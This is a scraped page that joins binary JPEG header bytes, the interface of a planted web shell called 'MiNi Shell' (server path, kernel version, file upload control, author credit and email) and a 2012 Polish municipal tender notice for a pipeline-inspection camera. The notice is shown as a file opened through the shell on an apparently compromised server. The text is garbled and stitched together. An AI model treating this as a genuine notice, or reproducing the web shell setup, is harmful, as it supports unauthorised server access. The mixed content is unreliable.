JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120416/119254-N-2012.html

<p class="kh_header"><b>Halinów: Dostawa fabrycznie nowej przenośnej kamery samojezdnej do inspekcji rurociągów wod. - kan. wraz z osprzętem</b><br>
<b>Numer ogłoszenia: 119254 - 2012; data zamieszczenia: 16.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Komunalny w Halinowie , ul. 3-go Maja 8, 05-074 Halinów, woj. mazowieckie, tel. 022 7604015, faks 022 7836905.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakladkomunalny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowej przenośnej kamery samojezdnej do inspekcji rurociągów wod. - kan. wraz z osprzętem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa fabrycznie nowej przenośnej kamery samojezdnej do inspekcji rurociągów wod. - kan. wraz z osprzętem, zwany dalej zestawem do inspekcji rur i kanałów wraz ze szkoleniem personelu zamawiającego w zakresie obsługi oferowanego systemu. 
2.	Oferowany system powinien umożliwiać, z poziomu terenu, dokonywanie inspekcji rur kanalizacyjnych w zakresie średnic od DN 150 mm do min. DN 600 mm. System winien umożliwiać wykrywanie istniejących uszkodzeń, nieprawidłowości montażu itp. oraz informować o ich lokalizacji z dokładnością +- 0,1 m. System powinien również dokonywać pomiaru spadku z dokładnością +- 0,1 procent oraz tworzyć profil spadku obrazujący rzeczywisty spadek rurociągu.
3.	 Zestaw do inspekcji rur winien obejmować:
3.1. Głowicę kamery inspekcyjnej - 1 szt.
3.2. Wózek samojezdny - 1 szt.
3.3.Windę kablową wraz z kablem - 1 szt.
3.4. System sterowania, wraz z monitorem i systemem rejestracji obrazu - 1 komplet.
3.5. Oprogramowanie inspekcyjne - 1 komplet.
3.6. Narzędzia i płyta do kalibracji sensora pomiaru spadku wózka kamery - 1 komplet.
3.7. Zestaw narzędzi podręcznych do prawidłowej eksploatacji urządzenia - 1 komplet.
3.8. Wyczerpującą instrukcję obsługi w języku polskim - 1 szt.
4. Minimalne wymagania dotyczące zestawu do inspekcji rur i kanałów:
4.1. Głowica kamery inspekcyjnej:
4.1.1. Kamera kolorowa cyfrowa.
4.1.2. Oświetlenie podstawowe - głowica z oświetlaczem typu LED.
4.1.3. Zoom optyczny min. 10x.
4.1.4. Kamera umożliwiająca inspekcję poprzez studnie rewizyjne 315 mm.
4.1.5. Kamera posiadająca funkcję automatycznego zerowania głowicy.
4.1.6. Czułość min.2 LUX.
4.1.7. Rozdzielczość 440.000 Pixeli.
4.1.8. Złącze kamery skręcane - wodoszczelne, zabezpieczone sprężyną uniemożliwiające załamanie kabla przy dławiku.
4.1.9. Wodoszczelność min.1 bar.
4.1.10. Rotacja głowicy w poziomie 360 st. bez ograniczeń.
4.1.11. Wychylenie głowicy w pionie 270 st.
4.1.12. Dodatkowe światła LED.
4.1.13. Zastosowanie do inspekcji kanałów w średnicach DN 150 mm do min. DN 600 mm.
4.1.14. Głowica wykonana z materiałów nierdzewnych, przystosowana do pracy pod wodą.
4.1.15. Kontrola szczelności.

4.2. Wózek samojezdny:
4.2.1. Zastosowanie do inspekcji kanałów w średnicach DN 150 mm do min. DN 600 mm.
4.2.2. Wózek min. czterokołowy samojezdny z napędem na wszystkie koła.
4.2.3. Komplet kół i dystansów umożliwiający inspekcję kanałów od DN150mm do min. DN600mm.
4.2.4. Wózek wykonany z materiałów nierdzewnych, przystosowany do pracy pod wodą.
4.2.5. Moc silnika dostosowana do wagi całego urządzenia.
4.2.6. Kontrola szczelności.
4.2.7. Wbudowany sensor pomiaru spadków z dokładnością co najmniej +- 0,1 %.
4.2.8. Wózek i głowica wypełniona azotem.
4.2.9. Uchwyt do opuszczania wózka.
4.2.10. Ręcznie regulowany pantograf do centrowania głowicy.
4.2.11. Przejście systemu w tryb awaryjny w przypadku utraty szczelności.
4.2.12. Zabezpieczenie elektroniki przez uszkodzeniem w sytuacji zalania wózka.

4.3. Winda kablowa:
4.3.1. Winda kablowa automatyczna o długości min. 150 m wykonana z materiałów odpornych na korozję, wyposażona w elektroniczny licznik pomiaru dystansu z funkcją zerowania.
4.3.2. Wyposażenie pulpitu windy w dodatkowy przełącznik do jazdy wózka przód - tył oraz przycisku do zwijania kabla na bęben w trybie ręcznym.
4.3.3. Winda wyposażona w wyłącznik bezpieczeństwa umożliwiający wyłączenie napędu elektrycznego windy w trybie awaryjnym.
4.3.4. Wyposażenie w dodatkowe rolki studzienne oraz rolki w kinecie.
4.3.5. Wyposażenie windy w sprzęgło do regulacji naciągu kabla.
4.3.6. Haki i lina do opuszczenia wózka.
4.3.7. Sprężyna zabezpieczająca kabel przed najechaniem (przy jeździe do tyłu przez wózek).
4.3.8. Winda napędzana silnikiem elektrycznym.
4.3.9. Synchronizacja pracy wózka z bębnem.
4.3.10. Synchronizacja siły naciągu kabla i prędkości zwijania kabla z prędkością jazdy wózka.

4.4	System sterowania:
4.4.1	Wielofunkcyjne sterowanie cyfrowe, pełna kontrola parametrów urządzeń.
4.4.2	Panel główny wyposażony w wyłącznik główny, bezpieczniki, sterowanie windą, gniazdo do podłączenia manipulatora.
4.4.3	Pulpit operatora wyposażony w generator napisów (na sygnał video, funkcje: dystans, inklinacja, data, czas, stan licznika, nazwa ulicy).
4.4.4. Panel operatora umożliwiający pełne sterowanie wszystkimi funkcjami wózka wraz z głowicą: ruch głowicą, jazda wózka przód - tył, regulacja ostrości obrazu, regulacja oświetlenia głowicy, regulacja jasności świateł dodatkowych, włączenie funkcji zerowania głowicy.
4.4.5. Widok dystansu, inklinacji, daty, czasu na obrazie kamery.
4.4.6. Regulacja ostrości z pulpitu operatora.
4.4.7. Komputer przemysłowy w zabudowie rack 19 - przenośny kufer zamykany z platformą Windows XP.
4.4.8. Klawiatura rack 19.
4.4.9. Monitor przemysłowy LCD nie mniejszy niż 15 cali.
4.4.10. Nagrywanie filmów z inspekcji na HDD i DVD, możliwość tworzenia wydruków.
4.4.11. Sterowanie wózkiem i głowicą za pomocą 2 joysticków.
4.4.12. Wbudowany wyświetlacz LCD wskazujący m.in.: inklinację, rotację głowicy, odległość rozwiniętego bębna, ciśnienie wewnątrz kamery.
4.4.13. Dodatkowe gniazdo do podłączenia kamery wpychanej.

4.5. Oprogramowanie inspekcyjne:
4.5.1. Program do obsługi kamery w wersji polskojęzycznej.
4.5.2. Pełny raport poinspekcyjny, film, wykres spadków, dane o zagłębieniu, raport danych, wydruki, schemat odcinka, informacje ogólne o inspekcji, załączanie zdjęć do protokołów.
4.5.3. Program umożliwiający bezpośredni eksport inspekcji na nośniki USB lub CD/DVD.
4.5.4. Kalibracja kamery z poziomu oprogramowania.
4.5.5. Kalibracja inklinacji wózka kamery z poziomu oprogramowania. 
4.5.6. Pomiar szczelin, owalu rur, uszkodzeń.
4.5.7. Wydruk raportów inspekcyjnych do formatu PDF.
4.5.8. Wskaźnik zegarowy położenia głowicy wyświetlany na ekranie.

4.6. Kompletny zestaw do zasilania wszystkich elementów zestawu, oparty na agregacie prądotwórczym z inwerterem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zgodnie z art. 67 ust. 1, pkt. 5</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.99.71.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O zamówienie mogą ubiegać się Wykonawcy, którzy:
1.1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeśli ustawy nakładają obowiązek posiadania takich uprawnień.
1.2.	Posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia.
1.3.	 Są uprawnieni do występowania w obrocie prawnym i nie podlegają wykluczeniu 
z postępowania o udzielenie zamówienia zgodne z art. 24 ust. 1 i 2 pzp.
2. Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale V niniejszej SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem Wykonawcy z postępowania. 
1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty i oświadczenia:
1.1	Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust.1 ustawy oraz o braku podstaw do wykluczenia (zawarte jest na oświadczeniu wykonawcy stanowiącym załącznik Nr 2 do niniejszej SIWZ).
1.2	Aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert.
1.3	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.4	Pozytywne referencje otrzymane od przynajmniej trzech klientów, na realizację zamówienia powyżej 90 000 zł brutto, obejmującego dostawę fabrycznie nowej kamery do inspekcji wod.-kan. o zbliżonych parametrach.
1.5	Kartę gwarancyjną, w której zostanie podany okres gwarancji na sprzęt i oprogramowanie, warunki naprawy, wymiany urządzenia, jego zespołów w tym należy ująć zakres prac gwarancyjnych oraz zespołów, które podlegają gwarancji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zakladkomunalny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. 3-go Maja 8, 05-074 Halinów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2012 godzina 10:00, miejsce: Zakład Komunalny w Halinowie, ul. 3-go Maja 8, 05-074 Halinów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com